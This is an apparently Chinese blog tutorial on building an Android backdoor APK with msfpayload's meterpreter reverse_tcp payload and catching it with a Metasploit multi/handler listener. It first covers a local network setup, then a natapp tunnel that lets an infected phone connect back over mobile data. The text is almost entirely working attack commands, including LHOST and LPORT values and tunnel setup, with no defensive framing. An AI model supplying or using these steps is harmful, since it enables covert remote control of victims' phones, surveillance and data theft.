1,內網木馬
先生成一個小馬
msfpayload -p android/meterpreter/reverse_tcp LHOST=192.168.8.104 LPORT=5555 R > android_backdoor.apk
ip填寫自己的內網ip ,端口自定
啟動 msfconsole
依次輸入下面的命令
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.8.104
set lport 5555
啟動監聽 exploie
然后把木馬整到手機里試試
2,外網木馬
首先要內網穿透,本人使用natapp服務 。你在natapp官網注冊好后獲得一條免費隧道,添加tcp通道,端口號自定,例如2018,ip填127.0.0.1
在linux下首先下載natapp的客戶端,然后再命令行內啟動natapp 語句: ./natapp -authtoken=************ 后面的星號換成自己的口令
(如果提示權限不夠 chmod a+x natapp )
啟動成功后可以看到下面圖片
ping 一下第一個圈內的服務器 得到ip地址120.3.51.1 后面位端口號 34611
准備完成了
開始生成外網小馬
msfpayload -p android/meterpreter/reverse_tcp LHOST=120.3.51.1 LPORT=34611 R > android_backdoor.apk
一定要注意ip和端口填服務器的
啟動 msfconsole
依次輸入下面的命令
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 2018
監聽127.0.0.1:2018 (內網穿透相當於先將數據發給服務器,然后由服務器發給內網中的我們 )
啟動exploie
用你的電話卡流量試試看